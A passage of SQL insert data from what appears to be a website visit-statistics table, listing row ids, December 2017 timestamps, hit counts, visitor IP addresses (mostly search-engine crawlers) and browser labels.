(190091,1514130437,1,1,0,0,'54.36.148.45','other'),(190092,1514130882,1,1,0,0,'207.46.13.12','other'),(190093,1514131376,1,1,0,0,'54.36.149.50','other'),(190094,1514131378,1,1,0,0,'54.36.149.28','other'),(190095,1514131448,1,1,0,0,'54.36.148.132','other'),(190096,1514131532,1,1,0,0,'54.36.149.101','other'),(190097,1514131639,1,1,0,0,'54.36.148.39','other'),(190098,1514132028,1,1,0,0,'157.55.39.101','other'),(190099,1514132070,1,1,0,0,'128.69.209.208','chrome'),(190100,1514132329,1,1,0,0,'54.36.148.165','other'),(190101,1514132594,1,1,0,0,'54.36.149.35','other'),(190102,1514132852,1,1,0,0,'54.36.148.250','other'),(190103,1514132884,1,1,0,0,'54.36.149.36','other'),(190104,1514133225,1,1,0,0,'54.36.149.60','other'),(190105,1514133489,1,1,0,0,'54.36.148.69','other'),(190106,1514133556,1,1,0,0,'54.36.149.23','other'),(190107,1514134202,1,0,1,0,'66.249.66.156',''),(190108,1514134443,1,1,0,0,'54.36.149.68','other'),(190109,1514134566,1,1,0,0,'54.36.148.123','other'),(190110,1514134614,1,1,0,0,'54.36.148.151','other'),(190111,1514134681,1,1,0,0,'91.196.178.132','chrome'),(190112,1514134871,1,1,0,0,'54.36.148.44','other'),(190113,1514135723,1,1,0,0,'54.36.148.247','other'),(190114,1514135847,1,1,0,0,'54.36.148.199','other'),(190115,1514135887,1,1,0,0,'54.36.148.102','other'),(190116,1514135996,1,1,0,0,'178.92.74.238','chrome'),(190117,1514136028,1,1,0,0,'54.36.149.93','other'),(190118,1514136183,1,1,0,0,'54.36.148.146','other'),(190119,1514136230,1,1,0,0,'54.36.148.141','other'),(190120,1514136382,1,1,0,0,'54.36.148.255','other'),(190121,1514136461,1,1,0,0,'54.36.148.229','other'),(190122,1514136828,1,1,0,0,'8.29.198.26','other'),(190123,1514136884,1,1,0,0,'54.36.148.108','other'),(190124,1514136940,1,1,0,0,'141.8.142.74','other'),(190125,1514137190,1,1,0,0,'54.36.149.41','other'),(190126,1514137485,1,1,0,0,'54.36.148.45','other'),(190127,1514137637,1,1,0,0,'54.36.148.189','other'),(190128,1514137855,1,1,0,0,'54.36.148.72','other'),(190129,1514138290,1,1,0,0,'54.36.149.70','other'),(190130,1514138671,2,2,0,0,'40.77.167.87','other'),(190131,1514138745,1,1,0,0,'54.36.148.31','other'),(190132,1514138982,1,1,0,0,'54.36.148.192','other'),(190133,1514139018,1,1,0,0,'54.36.149.11','other'),(190134,1514139074,1,1,0,0,'54.36.148.99','other'),(190135,1514139138,1,1,0,0,'54.36.148.85','other'),(190136,1514139292,1,1,0,0,'54.36.148.103','other'),(190137,1514139446,1,1,0,0,'54.36.148.116','other'),(190138,1514139922,1,1,0,0,'54.36.149.8','other'),(190139,1514140049,1,1,0,0,'54.36.148.165','other'),(190140,1514140131,2,2,0,0,'54.36.148.40','other'),(190141,1514140542,1,1,0,0,'54.36.148.68','other'),(190142,1514140555,1,1,0,0,'157.55.39.101','other'),(190143,1514141556,1,1,0,0,'54.36.149.70','other'),(190144,1514141645,1,1,0,0,'54.36.148.116','other'),(190145,1514141676,1,1,0,0,'54.36.148.132','other'),(190146,1514141813,1,1,0,0,'54.36.149.72','other'),(190147,1514142243,1,1,0,0,'54.36.148.67','other'),(190148,1514142510,2,2,0,0,'91.196.178.35','chrome'),(190149,1514142603,1,1,0,0,'54.36.148.134','other'),(190150,1514143035,1,1,0,0,'54.36.149.19','other'),(190151,1514143875,1,1,0,0,'54.36.148.145','other'),(190152,1514143919,1,1,0,0,'217.69.136.203','other'),(190153,1514144082,1,1,0,0,'54.36.148.141','other'),(190154,1514144128,1,1,0,0,'54.36.148.79','other'),(190155,1514144434,1,1,0,0,'54.36.149.18','other'),(190156,1514144435,1,1,0,0,'54.36.149.26','other'),(190157,1514144529,1,1,0,0,'54.36.148.42','other'),(190158,1514144699,1,1,0,0,'54.36.149.49','other'),(190159,1514144743,1,1,0,0,'54.36.148.57','other'),(190160,1514145100,1,1,0,0,'54.36.149.89','other'),(190161,1514145154,1,1,0,0,'54.36.149.94','other'),(190162,1514145164,1,1,0,0,'54.36.149.90','other'),(190163,1514145307,1,1,0,0,'54.36.148.244','other'),(190164,1514145508,1,1,0,0,'54.36.148.162','other'),(190165,1514146081,1,1,0,0,'87.250.224.46','other'),(190166,1514146321,1,1,0,0,'157.55.39.130','other'),(190167,1514146394,1,1,0,0,'89.178.233.203','msie'),(190168,1514146502,1,1,0,0,'54.36.148.10','other'),(190169,1514146820,1,1,0,0,'54.36.148.184','other'),(190170,1514147325,1,1,0,0,'54.36.149.5','other'),(190171,1514147529,1,1,0,0,'54.36.148.74','other'),(190172,1514147651,1,1,0,0,'8.29.198.25','other'),(190173,1514147746,1,1,0,0,'54.36.148.189','other'),(190174,1514147908,1,1,0,0,'54.36.148.168','other'),(190175,1514148115,1,1,0,0,'54.36.149.31','other'),(190176,1514148295,1,1,0,0,'157.55.39.130','other'),(190177,1514148409,1,1,0,0,'51.255.71.133','other'),(190178,1514148509,1,0,1,0,'66.249.64.29',''),(190179,1514148867,1,1,0,0,'54.36.148.40','other'),(190180,1514148993,1,1,0,0,'54.36.149.37','other'),(190181,1514149066,1,1,0,0,'54.36.148.126','other'),(190182,1514149091,1,1,0,0,'54.36.148.143','other'),(190183,1514149433,1,1,0,0,'207.46.13.12','other'),(190184,1514149569,1,1,0,0,'51.255.71.118','other'),(190185,1514149761,1,1,0,0,'54.36.148.162','other'),(190186,1514150323,1,1,0,0,'54.36.148.111','other'),(190187,1514150439,1,1,0,0,'54.36.149.44','other'),(190188,1514150456,1,1,0,0,'51.255.71.120','other'),(190189,1514150527,1,1,0,0,'40.77.167.87','other'),(190190,1514150631,1,1,0,0,'54.36.148.127','other'),(190191,1514150652,2,2,0,0,'54.36.149.79','other'),(190192,1514150685,1,1,0,0,'54.36.148.130','other'),(190193,1514150692,1,0,1,0,'66.249.64.30',''),(190194,1514150954,1,1,0,0,'54.36.148.167','other'),(190195,1514150970,1,0,1,0,'66.249.70.27',''),(190196,1514151427,1,1,0,0,'54.36.148.15','other'),(190197,1514151443,1,1,0,0,'54.36.148.150','other'),(190198,1514151498,1,1,0,0,'51.255.71.131','other'),(190199,1514151636,1,1,0,0,'54.36.148.28','other'),(190200,1514151976,1,1,0,0,'54.36.149.95','other'),(190201,1514152090,1,1,0,0,'51.255.71.133','other'),(190202,1514152133,1,1,0,0,'178.154.171.88','other'),(190203,1514152656,1,0,1,0,'66.249.70.29',''),(190204,1514152683,1,1,0,0,'54.36.148.243','other'),(190205,1514152760,1,1,0,0,'217.69.136.207','other'),(190206,1514152919,1,1,0,0,'54.36.148.175','other'),(190207,1514152950,1,1,0,0,'54.36.148.229','other'),(190208,1514153156,1,1,0,0,'51.255.71.113','other'),(190209,1514153177,1,1,0,0,'54.36.148.176','other'),(190210,1514153220,1,1,0,0,'176.14.192.60','msie'),(190211,1514153221,1,1,0,0,'95.84.251.223','msie'),(190212,1514153368,1,1,0,0,'54.36.148.252','other'),(190213,1514153426,1,1,0,0,'51.255.71.116','other'),(190214,1514153554,1,1,0,0,'54.36.148.22','other'),(190215,1514153599,1,1,0,0,'54.36.148.82','other'),(190216,1514153944,1,1,0,0,'54.36.149.66','other'),(190217,1514154141,1,1,0,0,'54.36.148.198','other'),(190218,1514154154,1,1,0,0,'40.77.167.87','other'),(190219,1514154234,1,1,0,0,'54.36.149.102','other'),(190220,1514154312,1,1,0,0,'54.36.148.78','other'),(190221,1514154884,1,1,0,0,'54.36.148.169','other'),(190222,1514155088,1,1,0,0,'54.36.148.15','other'),(190223,1514155273,1,1,0,0,'54.36.148.198','other'),(190224,1514155382,1,1,0,0,'54.36.149.106','other'),(190225,1514155518,1,1,0,0,'54.36.148.80','other'),(190226,1514155525,1,1,0,0,'54.36.148.72','other'),(190227,1514155994,1,1,0,0,'54.36.149.33','other'),(190228,1514156047,1,1,0,0,'54.36.149.25','other'),(190229,1514156352,1,0,1,0,'66.249.64.30',''),(190230,1514156372,1,1,0,0,'54.36.148.182','other'),(190231,1514156381,1,1,0,0,'51.255.71.130','other'),(190232,1514156595,1,1,0,0,'54.36.148.94','other'),(190233,1514157250,1,1,0,0,'157.55.39.101','other'),(190234,1514157313,2,2,0,0,'157.55.39.203','other'),(190235,1514157338,1,1,0,0,'54.36.148.33','other'),(190236,1514157414,1,0,1,0,'66.249.64.30',''),(190237,1514157575,1,1,0,0,'54.36.149.82','other'),(190238,1514157809,1,1,0,0,'51.255.71.114','other'),(190239,1514157948,1,0,1,0,'66.249.70.29',''),(190240,1514157978,1,1,0,0,'54.36.149.26','other'),(190241,1514157982,1,1,0,0,'54.36.148.35','other'),(190242,1514157984,1,1,0,0,'54.36.148.44','other'),(190243,1514158474,1,1,0,0,'8.29.198.25','other'),(190244,1514158518,1,1,0,0,'54.36.149.65','other'),(190245,1514159284,1,1,0,0,'54.36.148.112','other'),(190246,1514159331,1,1,0,0,'54.36.148.13','other'),(190247,1514159928,1,1,0,0,'54.36.148.102','other'),(190248,1514160302,1,1,0,0,'54.36.149.66','other'),(190249,1514160861,1,1,0,0,'54.36.149.31','other'),(190250,1514160952,1,1,0,0,'54.36.149.90','other'),(190251,1514160970,1,1,0,0,'54.36.148.205','other'),(190252,1514161047,1,1,0,0,'54.36.149.54','other'),(190253,1514161091,1,1,0,0,'54.36.148.197','other'),(190254,1514161171,1,1,0,0,'54.36.148.150','other'),(190255,1514161457,1,1,0,0,'54.36.148.43','other'),(190256,1514161737,1,1,0,0,'54.36.149.9','other'),(190257,1514161802,1,1,0,0,'54.36.149.74','other'),(190258,1514161840,1,1,0,0,'54.36.148.233','other'),(190259,1514161967,1,1,0,0,'54.36.149.26','other'),(190260,1514162074,1,1,0,0,'51.255.71.119','other'),(190261,1514162724,1,1,0,0,'54.36.148.159','other'),(190262,1514162794,1,1,0,0,'66.249.70.27','chrome'),(190263,1514162832,1,1,0,0,'54.36.148.152','other'),(190264,1514162859,1,1,0,0,'54.36.148.143','other'),(190265,1514163845,1,1,0,0,'54.36.148.70','other'),(190266,1514163916,1,1,0,0,'54.36.148.105','other'),(190267,1514164059,1,1,0,0,'54.36.149.68','other'),(190268,1514164104,1,1,0,0,'51.255.71.122','other'),(190269,1514164149,1,1,0,0,'54.36.148.32','other'),(190270,1514164215,1,1,0,0,'157.55.39.101','other'),(190271,1514164316,1,1,0,0,'54.36.149.66','other'),(190272,1514164691,1,1,0,0,'54.36.148.254','other'),(190273,1514164934,1,1,0,0,'54.36.148.176','other'),(190274,1514165493,1,1,0,0,'54.36.148.208','other'),(190275,1514165724,1,1,0,0,'54.36.149.15','other'),(190276,1514166144,1,1,0,0,'54.36.148.179','other'),(190277,1514166253,1,1,0,0,'54.36.148.87','other'),(190278,1514166330,1,1,0,0,'217.69.133.30','other'),(190279,1514166363,1,1,0,0,'54.36.148.28','other'),(190280,1514166366,1,1,0,0,'54.36.149.48','other'),(190281,1514166551,1,1,0,0,'54.36.149.106','other'),(190282,1514166716,1,1,0,0,'66.249.64.28','chrome'),(190283,1514166910,1,1,0,0,'54.36.148.92','other'),(190284,1514167076,1,1,0,0,'54.36.149.68','other'),(190285,1514167329,1,1,0,0,'54.36.148.173','other'),(190286,1514167542,1,1,0,0,'54.36.148.67','other'),(190287,1514167947,1,1,0,0,'54.36.148.83','other'),(190288,1514167977,1,1,0,0,'54.36.149.41','other'),(190289,1514168175,1,1,0,0,'54.36.149.101','other'),(190290,1514168225,1,0,1,0,'66.249.64.28',''),(190291,1514168247,1,1,0,0,'51.255.71.121','other'),(190292,1514168479,1,1,0,0,'54.36.148.252','other'),(190293,1514168785,1,1,0,0,'217.69.133.28','other'),(190294,1514168788,1,1,0,0,'51.255.71.125','other'),(190295,1514169011,1,1,0,0,'54.36.149.35','other'),(190296,1514169256,1,1,0,0,'54.36.148.202','other'),(190297,1514169275,1,1,0,0,'54.36.148.163','other'),(190298,1514169302,1,1,0,0,'8.29.198.25','other'),(190299,1514169452,1,1,0,0,'54.36.149.93','other'),(190300,1514169892,1,1,0,0,'54.36.149.99','other'),(190301,1514169897,1,1,0,0,'54.36.148.253','other'),(190302,1514169916,1,0,1,0,'66.249.70.25',''),(190303,1514169935,1,1,0,0,'51.255.71.120','other'),(190304,1514169960,1,1,0,0,'54.36.148.15','other'),(190305,1514170025,1,1,0,0,'54.36.148.49','other'),(190306,1514170205,1,1,0,0,'54.36.148.69','other'),(190307,1514170550,1,1,0,0,'51.255.71.122','other'),(190308,1514170985,1,1,0,0,'54.36.148.186','other'),(190309,1514171092,1,1,0,0,'54.36.148.160','other'),(190310,1514171837,1,1,0,0,'54.36.148.54','other'),(190311,1514172178,1,1,0,0,'54.36.148.64','other'),(190312,1514172346,1,1,0,0,'54.36.148.238','other'),(190313,1514172452,1,1,0,0,'54.36.148.110','other'),(190314,1514172498,1,1,0,0,'54.36.149.75','other'),(190315,1514172754,1,1,0,0,'54.36.148.60','other'),(190316,1514172818,1,1,0,0,'54.36.149.56','other'),(190317,1514173407,1,1,0,0,'54.36.148.206','other'),(190318,1514173514,1,1,0,0,'157.55.39.130','other'),(190319,1514173523,1,1,0,0,'54.36.149.74','other'),(190320,1514173565,1,1,0,0,'54.36.148.69','other'),(190321,1514173836,1,1,0,0,'54.36.149.61','other'),(190322,1514174309,1,1,0,0,'54.36.148.80','other'),(190323,1514174385,1,1,0,0,'51.255.71.121','other'),(190324,1514174448,1,1,0,0,'176.193.125.110','msie'),(190325,1514175046,1,1,0,0,'54.36.149.12','other'),(190326,1514175381,1,1,0,0,'54.36.148.25','other'),(190327,1514176115,1,1,0,0,'54.36.148.80','other'),(190328,1514176216,1,1,0,0,'54.36.148.149','other'),(190329,1514176348,1,1,0,0,'54.36.148.178','other'),(190330,1514176700,1,1,0,0,'54.36.148.13','other'),(190331,1514176790,1,1,0,0,'54.36.148.248','other'),(190332,1514176841,1,1,0,0,'54.36.148.250','other'),(190333,1514176901,1,1,0,0,'54.36.148.154','other'),(190334,1514177363,1,1,0,0,'54.36.148.40','other'),(190335,1514177598,1,1,0,0,'54.36.149.27','other'),(190336,1514178168,1,1,0,0,'54.36.149.25','other'),(190337,1514178294,1,1,0,0,'54.36.148.60','other'),(190338,1514178295,1,1,0,0,'54.36.148.232','other'),(190339,1514178329,1,1,0,0,'54.36.149.39','other'),(190340,1514178764,1,1,0,0,'217.69.133.252','other'),(190341,1514179026,1,1,0,0,'54.36.148.15','other'),(190342,1514179209,1,1,0,0,'54.36.148.65','other'),(190343,1514179222,1,1,0,0,'54.36.149.95','other'),(190344,1514179325,1,1,0,0,'54.36.149.59','other'),(190345,1514179657,1,0,1,0,'66.249.70.25',''),(190346,1514179873,1,1,0,0,'54.36.148.245','other'),(190347,1514180127,1,1,0,0,'8.29.198.25','other'),(190348,1514180167,1,1,0,0,'54.36.148.105','other'),(190349,1514180195,1,1,0,0,'54.36.148.230','other'),(190350,1514180258,1,1,0,0,'54.36.149.48','other'),(190351,1514180748,1,1,0,0,'54.36.148.88','other'),(190352,1514180810,1,1,0,0,'54.36.149.57','other'),(190353,1514180960,1,1,0,0,'54.36.148.43','other'),(190354,1514181269,1,1,0,0,'54.36.149.31','other'),(190355,1514181334,1,1,0,0,'54.36.149.63','other'),(190356,1514181400,1,1,0,0,'91.196.178.165','chrome'),(190357,1514181450,1,1,0,0,'54.36.148.117','other'),(190358,1514181669,1,1,0,0,'54.36.148.45','other'),(190359,1514181673,1,1,0,0,'54.36.149.91','other'),(190360,1514181910,1,1,0,0,'54.36.148.127','other'),(190361,1514182424,1,1,0,0,'217.69.133.68','other'),(190362,1514182446,1,1,0,0,'54.36.149.36','other'),(190363,1514182519,1,1,0,0,'54.36.148.186','other'),(190364,1514182640,1,1,0,0,'54.36.148.76','other'),(190365,1514182753,1,1,0,0,'54.36.149.23','other'),(190366,1514183108,1,1,0,0,'54.36.148.139','other'),(190367,1514183138,1,1,0,0,'109.63.193.139','msie'),(190368,1514183257,1,1,0,0,'217.69.133.243','other'),(190369,1514183310,1,1,0,0,'207.46.13.12','other'),(190370,1514183320,1,1,0,0,'54.36.149.87','other'),(190371,1514183354,1,1,0,0,'54.36.148.154','other'),(190372,1514183472,1,1,0,0,'54.36.148.57','other'),(190373,1514183493,1,1,0,0,'51.255.71.117','other'),(190374,1514183573,1,1,0,0,'54.36.148.10','other'),(190375,1514183705,1,1,0,0,'54.36.148.195','other'),(190376,1514183788,1,0,1,0,'66.249.70.29',''),(190377,1514184208,1,0,1,0,'66.249.70.27',''),(190378,1514184384,1,1,0,0,'54.36.148.199','other'),(190379,1514184556,1,1,0,0,'54.36.149.84','other'),(190380,1514184646,1,1,0,0,'37.147.233.113','msie'),(190381,1514184664,1,1,0,0,'54.36.149.51','other'),(190382,1514184754,1,1,0,0,'54.36.148.79','other'),(190383,1514185015,1,1,0,0,'54.36.148.28','other'),(190384,1514185164,1,1,0,0,'46.188.40.97','msie'),(190385,1514185233,1,1,0,0,'54.36.148.105','other'),(190386,1514185272,1,1,0,0,'54.36.148.161','other'),(190387,1514185776,1,1,0,0,'54.36.149.58','other'),(190388,1514185967,1,1,0,0,'5.228.129.95','msie'),(190389,1514186015,1,1,0,0,'51.255.71.133','other'),(190390,1514186084,1,1,0,0,'5.16.83.238','msie'),(190391,1514186096,1,1,0,0,'54.36.149.81','other'),(190392,1514186113,1,1,0,0,'54.36.148.61','other'),(190393,1514186556,1,1,0,0,'54.36.149.1','other'),(190394,1514186578,1,1,0,0,'54.36.149.28','other'),(190395,1514186677,14,14,0,0,'192.151.145.178','other'),(190396,1514186704,1,1,0,0,'51.255.71.118','other'),(190397,1514187285,1,1,0,0,'54.36.148.236','other'),(190398,1514187760,1,1,0,0,'54.36.149.7','other'),(190399,1514187874,1,1,0,0,'54.36.149.39','other'),(190400,1514187936,1,1,0,0,'54.36.148.39','other'),(190401,1514187971,1,1,0,0,'54.36.149.11','other'),(190402,1514188058,1,1,0,0,'54.36.148.41','other'),(190403,1514188076,1,1,0,0,'54.36.149.102','other'),(190404,1514188077,1,1,0,0,'54.36.149.81','other'),(190405,1514188142,1,1,0,0,'54.36.148.20','other'),(190406,1514188424,1,1,0,0,'54.36.148.119','other'),(190407,1514188458,1,1,0,0,'194.183.183.82','chrome'),(190408,1514188618,1,1,0,0,'54.36.148.31','other'),(190409,1514188879,1,1,0,0,'178.92.74.238','chrome'),(190410,1514189344,1,1,0,0,'54.36.148.155','other'),(190411,1514189502,1,1,0,0,'54.36.148.121','other'),(190412,1514189559,1,1,0,0,'66.249.70.27','chrome'),(190413,1514189651,1,1,0,0,'54.36.148.113','other'),(190414,1514189728,1,1,0,0,'66.249.64.29','chrome'),(190415,1514189839,1,1,0,0,'54.36.148.250','other'),(190416,1514189969,1,1,0,0,'51.255.71.123','other'),(190417,1514190068,2,2,0,0,'95.213.141.124','opera'),(190418,1514190224,1,1,0,0,'130.180.211.228','chrome'),(190419,1514190573,1,1,0,0,'54.36.149.38','other'),(190420,1514190631,1,1,0,0,'54.36.148.205','other'),(190421,1514190768,1,1,0,0,'54.36.149.103','other'),(190422,1514190884,1,1,0,0,'54.36.148.122','other'),(190423,1514190913,1,1,0,0,'54.36.149.74','other'),(190424,1514190960,1,1,0,0,'8.29.198.26','other'),(190425,1514190979,1,1,0,0,'51.255.71.132','other'),(190426,1514191054,1,1,0,0,'54.36.149.102','other'),(190427,1514191062,1,1,0,0,'54.36.148.15','other'),(190428,1514191138,1,1,0,0,'91.196.178.20','chrome'),(190429,1514191163,1,1,0,0,'54.36.149.104','other'),(190430,1514191365,1,1,0,0,'54.36.148.203','other'),(190431,1514191406,1,1,0,0,'54.36.149.58','other'),(190432,1514191632,1,1,0,0,'54.36.148.37','other'),(190433,1514191780,1,1,0,0,'54.36.149.15','other'),(190434,1514191817,1,1,0,0,'54.36.149.100','other'),(190435,1514191975,1,1,0,0,'54.36.149.44','other'),(190436,1514192461,1,1,0,0,'54.36.148.23','other'),(190437,1514192507,1,1,0,0,'54.36.149.11','other'),(190438,1514192674,1,1,0,0,'54.36.148.206','other'),(190439,1514192871,1,1,0,0,'217.69.133.216','other'),(190440,1514193668,1,1,0,0,'54.36.148.92','other'),(190441,1514193709,1,1,0,0,'54.36.148.82','other'),(190442,1514193785,1,1,0,0,'54.36.148.207','other'),(190443,1514193853,1,1,0,0,'54.36.148.27','other'),(190444,1514193953,3,3,0,0,'178.154.171.88','other'),(190445,1514193986,1,1,0,0,'54.36.148.10','other'),(190446,1514193994,1,1,0,0,'128.72.121.20','msie'),(190447,1514194027,1,1,0,0,'51.255.71.130','other'),(190448,1514194119,1,1,0,0,'54.36.148.141','other'),(190449,1514194754,1,1,0,0,'51.255.71.133','other'),(190450,1514195229,1,1,0,0,'54.36.148.205','other'),(190451,1514195300,1,1,0,0,'51.255.71.127','other'),(190452,1514195446,1,1,0,0,'54.36.149.50','other'),(190453,1514195529,1,1,0,0,'54.36.148.149','other'),(190454,1514195862,2,2,0,0,'141.8.142.74','other'),(190455,1514195955,1,1,0,0,'54.36.149.30','other'),(190456,1514196014,1,1,0,0,'54.36.149.61','other'),(190457,1514196176,1,1,0,0,'54.36.149.19','other'),(190458,1514196232,1,1,0,0,'54.36.149.13','other'),(190459,1514196303,1,1,0,0,'54.36.148.105','other'),(190460,1514196340,1,1,0,0,'54.36.149.106','other'),(190461,1514196358,1,1,0,0,'178.154.171.88','other'),(190462,1514196404,1,1,0,0,'54.36.149.39','other'),(190463,1514196693,1,1,0,0,'37.9.113.115','other'),(190464,1514196773,1,1,0,0,'195.10.210.70','chrome'),(190465,1514196774,1,1,0,0,'51.255.71.127','other'),(190466,1514196795,1,1,0,0,'37.9.113.110','other'),(190467,1514196934,1,1,0,0,'178.154.200.28','other'),(190468,1514196938,1,1,0,0,'37.9.113.157','other'),(190469,1514197609,3,3,0,0,'178.154.171.88','other'),(190470,1514197715,1,1,0,0,'40.77.167.70','other'),(190471,1514197896,6,6,0,0,'141.8.142.74','other'),(190472,1514197913,1,1,0,0,'54.36.148.198','other'),(190473,1514198000,1,1,0,0,'54.36.148.117','other'),(190474,1514198048,1,1,0,0,'207.244.157.138','chrome'),(190475,1514198439,1,0,1,0,'66.249.70.29',''),(190476,1514198475,1,1,0,0,'51.255.71.121','other'),(190477,1514198796,1,1,0,0,'54.36.149.50','other'),(190478,1514198864,1,1,0,0,'54.36.149.64','other'),(190479,1514198904,1,1,0,0,'54.36.149.89','other'),(190480,1514198946,4,4,0,0,'141.8.142.74','other'),(190481,1514198995,4,4,0,0,'178.154.171.88','other'),(190482,1514199045,1,1,0,0,'87.250.224.46','other'),(190483,1514199113,1,1,0,0,'54.36.148.161','other'),(190484,1514199118,1,1,0,0,'54.36.148.201','other'),(190485,1514199262,1,0,1,0,'66.249.64.30',''),(190486,1514199405,1,1,0,0,'54.36.148.194','other'),(190487,1514199471,1,1,0,0,'54.36.149.46','other'),(190488,1514199949,3,3,0,0,'178.154.171.88','other'),(190489,1514200110,1,1,0,0,'54.36.149.29','other'),(190490,1514200338,1,1,0,0,'54.36.148.199','other'),(190491,1514200406,1,1,0,0,'66.249.64.28','chrome'),(190492,1514200519,1,1,0,0,'54.36.148.43','other'),(190493,1514200571,1,1,0,0,'54.36.149.88','other'),(190494,1514200853,2,2,0,0,'178.154.171.88','other'),(190495,1514201009,1,1,0,0,'51.255.71.130','other'),(190496,1514201063,4,4,0,0,'141.8.142.74','other'),(190497,1514201304,1,1,0,0,'66.249.64.29','chrome'),(190498,1514201531,1,0,1,0,'66.249.64.28',''),(190499,1514201790,1,1,0,0,'8.29.198.25','other'),(190500,1514202551,1,1,0,0,'54.36.148.144','other'),(190501,1514202617,1,0,1,0,'66.249.70.29',''),(190502,1514202786,1,1,0,0,'54.36.149.66','other'),(190503,1514202900,1,1,0,0,'54.36.149.62','other'),(190504,1514202979,3,3,0,0,'178.154.171.88','other'),(190505,1514203275,1,1,0,0,'54.36.148.70','other'),(190506,1514203284,1,1,0,0,'54.36.149.47','other'),(190507,1514203476,1,1,0,0,'87.250.224.46','other'),(190508,1514203502,1,1,0,0,'54.36.148.141','other'),(190509,1514203517,3,3,0,0,'141.8.142.74','other'),(190510,1514203540,1,1,0,0,'54.36.148.231','other'),(190511,1514203785,1,1,0,0,'54.36.149.99','other'),(190512,1514203823,1,1,0,0,'195.10.210.70','chrome'),(190513,1514203916,1,1,0,0,'54.36.149.96','other'),(190514,1514204038,1,1,0,0,'54.36.148.239','other'),(190515,1514204129,1,1,0,0,'54.36.148.154','other'),(190516,1514204181,1,1,0,0,'54.36.148.130','other'),(190517,1514204337,1,1,0,0,'217.69.133.227','other'),(190518,1514204355,1,1,0,0,'54.36.148.67','other'),(190519,1514204406,1,1,0,0,'51.255.71.113','other'),(190520,1514204462,1,1,0,0,'66.249.64.28','chrome'),(190521,1514204489,1,1,0,0,'51.255.71.122','other'),(190522,1514204537,1,1,0,0,'54.36.148.158','other'),(190523,1514204560,1,1,0,0,'51.255.71.114','other'),(190524,1514204604,1,1,0,0,'54.36.148.197','other'),(190525,1514204799,1,1,0,0,'54.36.149.106','other'),(190526,1514204935,1,1,0,0,'54.36.148.108','other'),(190527,1514205021,1,1,0,0,'178.154.171.88','other'),(190528,1514205063,1,1,0,0,'54.36.149.90','other'),(190529,1514205136,2,2,0,0,'87.250.224.46','other'),(190530,1514205400,1,1,0,0,'54.36.148.131','other'),(190531,1514205536,1,1,0,0,'54.36.149.75','other'),(190532,1514205819,1,1,0,0,'54.36.148.249','other'),(190533,1514205854,1,1,0,0,'54.36.148.80','other'),(190534,1514205909,1,1,0,0,'54.36.148.106','other'),(190535,1514205990,1,1,0,0,'54.36.148.97','other'),(190536,1514206248,1,1,0,0,'54.36.148.247','other'),(190537,1514206513,1,1,0,0,'207.46.13.129','other'),(190538,1514206733,1,1,0,0,'54.36.148.90','other'),(190539,1514206807,1,1,0,0,'54.36.148.107','other'),(190540,1514206811,1,1,0,0,'54.36.148.169','other'),(190541,1514207010,1,0,1,0,'66.249.70.27',''),(190542,1514207192,1,1,0,0,'141.8.142.74','other'),(190543,1514207358,1,1,0,0,'54.36.149.97','other'),(190544,1514207695,1,1,0,0,'207.46.13.129','other'),(190545,1514207778,1,1,0,0,'54.36.148.173','other'),(190546,1514207805,1,1,0,0,'91.196.177.11','other'),(190547,1514207903,1,1,0,0,'54.36.148.188','other'),(190548,1514207921,1,1,0,0,'54.36.148.35','other'),(190549,1514207986,1,1,0,0,'54.36.149.64','other'),(190550,1514208017,1,1,0,0,'54.36.149.0','other'),(190551,1514208064,1,1,0,0,'54.36.148.89','other'),(190552,1514208329,2,2,0,0,'54.36.149.44','other'),(190553,1514208403,1,1,0,0,'54.36.148.65','other'),(190554,1514208670,1,1,0,0,'54.36.148.147','other'),(190555,1514208776,1,1,0,0,'54.36.148.157','other'),(190556,1514208866,2,2,0,0,'178.154.171.88','other'),(190557,1514208983,1,1,0,0,'54.36.148.57','other'),(190558,1514209454,1,1,0,0,'54.36.148.206','other'),(190559,1514209554,1,1,0,0,'66.249.70.29','chrome'),(190560,1514209622,1,1,0,0,'66.249.64.28','chrome'),(190561,1514209773,1,1,0,0,'54.36.149.51','other'),(190562,1514209799,1,1,0,0,'54.36.149.96','other'),(190563,1514210143,1,1,0,0,'108.59.8.70','other'),(190564,1514210269,1,1,0,0,'54.36.148.194','other'),(190565,1514210558,3,3,0,0,'141.8.142.74','other'),(190566,1514210691,1,1,0,0,'54.36.148.99','other'),(190567,1514210793,2,2,0,0,'178.154.171.88','other'),(190568,1514210841,1,1,0,0,'54.36.148.190','other'),(190569,1514210960,1,1,0,0,'51.255.71.132','other'),(190570,1514210971,1,1,0,0,'125.209.235.180','other'),(190571,1514211000,1,1,0,0,'178.92.74.238','chrome'),(190572,1514211258,1,1,0,0,'54.36.148.175','other'),(190573,1514211694,1,1,0,0,'54.36.148.179','other'),(190574,1514212167,1,1,0,0,'217.69.133.222','other'),(190575,1514212234,1,1,0,0,'54.36.148.229','other'),(190577,1514212284,1,1,0,0,'54.36.148.134','other'),(190578,1514212411,1,1,0,0,'54.36.148.146','other'),(190579,1514212549,1,1,0,0,'54.36.148.131','other'),(190580,1514212617,1,1,0,0,'8.29.198.27','other'),(190581,1514212685,1,1,0,0,'91.196.178.162','chrome'),(190582,1514213029,1,1,0,0,'54.36.148.15','other'),(190583,1514213138,1,1,0,0,'66.249.64.29','chrome'),(190584,1514213444,1,1,0,0,'157.55.39.101','other'),(190585,1514213586,1,1,0,0,'54.36.148.129','other'),(190586,1514213591,1,1,0,0,'51.255.71.113','other'),(190587,1514213827,1,1,0,0,'54.36.148.92','other'),(190588,1514213858,1,1,0,0,'54.36.148.229','other'),(190589,1514213893,1,1,0,0,'54.36.148.66','other'),(190590,1514214013,1,1,0,0,'54.36.148.93','other'),(190591,1514214036,1,1,0,0,'54.36.149.93','other'),(190592,1514214108,1,1,0,0,'54.36.148.203','other'),(190593,1514214268,3,3,0,0,'141.8.142.74','other'),(190594,1514214302,1,1,0,0,'54.36.148.173','other'),(190595,1514214659,1,1,0,0,'54.36.148.39','other'),(190596,1514214812,1,1,0,0,'54.36.148.87','other'),(190597,1514214963,1,1,0,0,'178.154.171.88','other'),(190598,1514214996,1,1,0,0,'54.36.148.12','other'),(190599,1514215077,1,0,1,0,'66.249.70.27',''),(190600,1514215110,1,1,0,0,'54.36.148.104','other'),(190601,1514215202,1,1,0,0,'54.36.149.71','other'),(190602,1514215248,1,1,0,0,'54.36.149.91','other'),(190603,1514215298,1,1,0,0,'54.36.148.58','other'),(190604,1514215299,1,1,0,0,'54.36.149.9','other'),(190605,1514215562,1,1,0,0,'54.36.149.79','other'),(190606,1514215739,1,1,0,0,'54.36.148.21','other'),(190607,1514215942,1,1,0,0,'109.63.213.17